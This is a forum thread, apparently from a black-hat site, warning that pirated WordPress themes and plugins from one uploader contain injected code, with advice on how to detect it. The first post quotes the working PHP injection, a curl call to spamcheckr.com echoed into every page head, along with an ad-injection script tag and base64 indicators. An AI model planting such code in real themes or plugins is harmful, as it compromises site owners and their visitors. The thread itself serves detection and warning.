56.gif

Search (advanced search)
Use this Search form before posting, asking or make a new thread.
Tips: Use Quotation mark to search words (eg. "How To Make Money Online")

09-25-2014, 10:54 AM (This post was last modified: 09-25-2014 11:04 AM by BRZ.)
Post: #1
List of Themes Infected: BE AWARE!
I'm compiling a list of themes infected and the OPs who have uploaded them...
Please, help on it.

I've already found more than 5 plug-ins shared by the member Flagged as VIRUS SPAM SITE (Do NOT CLICK!!!)-Vip, owner of the website http://Flagged as VIRUS SPAM SITE (Do NOT CLICK!!!)/ and there are probably a lot more of it. Probably you may have used one of them and your site and data is already compromised. As a measure, I'm starting this thread, and I hope the administrators don't ban me for this. If don't come back, or if this thread simply disappear, you are not in good hands at bestblackhatforum.com and I'll let you know it in the PasteBin and PasteBay - However, I do trust on administrators of communities like this, and I hope it is not the case...

Lets start finding and reporting the rotten apples!
Lets grab all these these guys...

Members be Aware!
Read it entirely...

These guys, namely Flagged as VIRUS SPAM SITE (Do NOT CLICK!!!)-Vip, also from the website http://Flagged as VIRUS SPAM SITE (Do NOT CLICK!!!)/ has been sharing malicious codes within their release!
This is the way they are doing money, and releasing more and more contents here and around the web with malicious scripts on it which helps them doing money.


To keep it simple...
1. Grab yourself a copy of DreamWeaver which will help you to search for codes and contents on an entire directory;
2. Open it, and hit the CTRL+F and point it to search inside a directory path you have your source;
3. Pay attention to the following lines you'll be searching for, and hit the 'find everything' button.
4. Try to grab a copy of Beyond Compare, which lets you to compare tons of files instantly...


If you ever downloaded something from them, promptly inspect your source code for curl_init functions, obfuscated codes, and some dirty clean code as well like ones I'll mention below:

Item A:
If you have it there, drop your site and start all over. Your site is already completely screwed... I'd start all over.
And add more reps to these low life beggars! Or go find them and teach them a lesson...
Search item by item, and if you find one, you've been screwed up.
Quote:spamcheckr
http://spamcheckr.com/
"http://spamcheckr.com/l.php"

adwat
http://adwat.ch/
http://adwat.ch/js/easylink.js


Here it is the entire code:

<?php if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqv12_cahesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,​1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqv12_cahesk');}}
?>
<?php


And some more:

<script type="text/javascript">
var adwatch_id = 234224;
var adwatch_advert = "int";
var exclude_domains = ['affiliates.playboy.com', 'elperutienetalento.com', 'skeezybabes.com', 'wp-admin', 'kamapisachi.info', 'nude', 'sex', 'porn', 'naked', 'F***', 'cock', 'penis', 'tits', 'boobs', 'pussy', 'wp-login', 'hillaryClinton2016.com', 'mpmgworld.com', 'madeforher.in'];
</script>
<script type="text/javascript" src="http://adwat.ch/js/easylink.js"></script>


Item B:
If you find the exact obfuscated codes such the one below, drop it as well and start all over: You've got screwed by them as well.
If you find other obfuscated codes such as the other examples, I'd start all over as well, but it is up to you to decide it... However, some software developers uses obfuscated codes for protecting their source codes; but in anyway, I usually don't accept using anything obfuscated myself mainly when I download it from the Internet around the forums.Search for one by one, line by line, and not all the four in these examples. If you find something on this example, you're also screwed!
Quote:c3BhbWNoZWNrci5jb20vY2hlY2sucGhw
amFxcXNjaWdzQGdtYWlsLmNvbQ==
d29yZHByZXNzc2xvZ0B5YW5kZXguY29t
NdLJlmNQAADQX8muqo6FIKZTXV0HEUKixCybPsIzBOGZHu

Item C:
Look for functions like the ones below and inspect the URLs (links) that goes near by them. If you find some URL that might not be there, and with it I mean an "strange URL", something other than the developer URL or well know and trusted URLs, take double care and go further and try to figure out what does these addresses are pointing at. Again, if it is pointing to some unknown URL, you probably should not use it and try to get an original copy of the code to compare it, and if in your comparison it does not match, you are probably screwed as well. Search for:
Quote:curl_init
$addressd

Item D:
DO NOT BELIEVE in VirusTotal... It will not detect many of these craps all these guys are doing:
Check your self all the things prior to using it!
This is a good start.

If you found something infected or suspect, promptly report it as malicious with the following message and hitting the report button:
This nonsense has uploaded an infected item, and the OP should be permanently banned!
We are sharing our findings on these threads below, compiling a list of Members uploading infected items, as well the URLs.
Do not download it!
And please, help us on it here:


For Plug-ins:
http://bestblackhatforum.com/Thread-List...d-BE-AWARE

For Themes:
http://bestblackhatforum.com/Thread-List...d-BE-AWARE


Thanks,

Pastebin and Pastebay for copying the main part of the above message to help other users to find infected stuff they have downloaded...
Please, copy and paste its contents on the threads you found something infected so other people can be aware of it and learn how to find these stuff, and also share it he with us, by reporting the members uploading these bad contents as well the URLs to these contents.

Simply hit the reply button, select SOURCE and paste it, and it will be formated correctly to the thread.
Copy and paste it on all the threads you find an infected item please so people can get to know it:
http://*marked as SPAM*/LNNHvQMQ
http://pastebay.net/1498225
09-25-2014, 11:39 AM
Post: #2
RE:
People should be checking themes and plugins properly before testing them out. Malicious code is one of the major risks you run with downloading themes and plugins without buying them from the actual authors. It doesn't matter who is uploading them. You should check the product out regardless.
09-25-2014, 11:46 AM
Post: #3
RE:
sorry i cant read all of the first post, but s post about infected themes etc should be made a sticky, ive had VERY serious problems from downloading then installing infected themes from here.

i dont know if the virus etc was through ignorance or with intent, but either way they can (and do) cause very serious problems.

i dont know if virustotal will find all of the infections, but that should be a minimum requirement in order to post anything.
09-25-2014, 11:51 AM
Post: #4
RE:
Thanks BRZ, this is a great help for me. I suspect it also after downloading several theme from him.
As a simple checking, check the zip file contents date and file. If the date or file is suspicious, it means the file was touched or modified before. But this is only for simple checking.
Thanks again BRZ, I really appreciate your info sharing.
09-25-2014, 02:27 PM
Post: #5
RE:
Just had some problems today and hopefully it's cleared up now so thanks for the insight..
9.gif
09-25-2014, 03:08 PM
Post: #6
RE:
+++OP

If I could give you more reps, I would.

I have run into issues too with some of these downloaded themes.

I had one account with about 5 sites be suspended because of malicious code. In one instance, the damned stuff was running pages off my sites, *and* sending out emails from that server. *sigh*.

I had been meaning to start a thread about this, but thank you OP.

I think that people should start including the sources for their shared plugins/themes. i.e. Did they buy them, or did they just reshare stuff they picked up somewhere else on the internet.
09-25-2014, 03:49 PM
Post: #7
RE:
So where's the list? You are just telling us to be aware? Already been done!
09-25-2014, 04:24 PM
Post: #8
RE:
(09-25-2014 03:49 PM)bale Wrote:  So where's the list? You are just telling us to be aware? Already been done!
For starters, you should assume that *anything* that is uploaded by Flagged as VIRUS SPAM SITE (Do NOT CLICK!!!)-vip is infected. DO NOT INSTALL.

That's a pretty big list right there.

This has got to be a community effort. Nobody can do it alone. As individuals find infected themes and plugins, they should add them to this post, and get the OPs banned.

It might mean fewer shares, but they will be safer shares.
09-25-2014, 04:41 PM
Post: #9
RE:
Thats the point. Everyone sez "in general" yet besides a few plugins shared and with infected proof no one will be more specific regarding themes for example.
09-25-2014, 06:02 PM
Post: #10
RE:
(09-25-2014 04:41 PM)bale Wrote:  Thats the point. Everyone sez "in general" yet besides a few plugins shared and with infected proof no one will be more specific regarding themes for example.
Again, that's why this has to be a combined, and concerted effort. One thread where people who discover issues can post their findings so we can have a canonical resource is a great start.

Take Flagged as VIRUS SPAM SITE (Do NOT CLICK!!!)-vip. The last theme posted by him I looked at was Andon. Here's the link to that post
http://bestblackhatforum.com/Thread-Ando...ress-Theme


A few things wrong with this theme::
(also see the screenshots at the bottom of this post)
1. Out of date
For starters, this theme, like most of his shares, is out of date. In this particular case, he shares v1.1, which (according to date stamps on the files), is from March, some 6 months ago. He clearly has not got this theme from source since he would be sharing a more recent version if that was the case.

2. Additional files
He's added a couple of additional files in the archive, including a .url link to his site. I've seen cases where these are included in the theme archive to be uploaded to your site

3. Stylesheet
The theme stylesheet has been amended to include "Downloaded from wplocker.com"

4. 404 page
The 404 page too has been amended to include a WPLocker.com reference.

5. Screenshot
The theme's screenshot has been amended to include a WPLocker reference

6. More in the backend
If you are still brave enough to actually install this theme, there are a few more very prominent references to WPLocker in the theme options.

7. More going on
I just have not had time to dig through the files in the theme, but if the above alone is not enough, you can almost be sure that there is a lot more happening under the hood.


[Image: GdNuAWVN.png]


[Image: pg6JhhFu.png]


[Image: GwryRw5n.png]


[Image: pO4Hc07z.png]


[Image: z74OCxsP.png]

Please Ban Him/Her
So yeah, while I am not a particularly active or prolific poster here, I strongly lend my support to the move to completely ban this person.
60.gif




16.gif